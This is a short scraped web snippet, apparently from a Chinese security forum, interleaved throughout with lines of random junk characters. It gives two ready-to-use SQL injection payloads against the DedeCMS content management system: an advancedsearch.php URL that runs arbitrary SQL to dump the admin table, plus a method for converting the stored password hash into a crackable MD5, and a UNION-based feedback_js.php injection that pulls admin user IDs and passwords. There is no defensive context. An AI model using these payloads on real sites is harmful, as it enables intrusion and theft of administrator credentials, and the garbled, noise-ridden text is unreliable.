U: N; @) E4 x* [# {+ u: I# w1 w% \0 B2 x2 e1 O
6 h! f. D+ p4 V: ^
: M/ O+ ], W/ L9 x
5 w9 F6 j8 u) d- z L) R
/ I Y$ h( m% d: e7 u
5 _1 E3 M0 `) u* b5 [) ]
( I) z* J% v+ \. V 6 V$ k: E6 y/ ]DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 " x% B* k" A5 q& S2 r
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`0 R# ~. V% D* i( \2 }7 R
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5& m4 `% s& b3 N+ Z$ W0 b
$ x7 T6 a6 {! T; L/ _4 Y) t+ s0 e
! z# ?+ j: i. Q, c" L# q
6 z% {( L3 Z% e4 C' m. U% q d ' x* ~' K% Q/ F/ I9 s& I# s ! {7 ^+ \1 F3 p$ t5 n, I' h# I" k1 D+ `2 ~6 y
: m& F: p+ |8 U& P( D
; C& g H1 z2 L; V/ a G$ A
2 |" R L# o" j. S
9 ~: m9 \/ y4 k1 W4 K
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞 g5 B! f Q" r5 h
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''=' 9 q5 @9 Q+ f: [. n/ x8 `/ Z* c8 \, h0 f" X/ i/ E
$ m5 ^ O' @1 T, @ % J. o; l- E* H1 X* G8 S# ]8 F! z F- H5 l8 T" w$ o1 A
" T8 ]: N% ^0 r F 1 {; R1 M6 ^- i8 j/ ~+ A- p# e# U) b/ d. c8 ]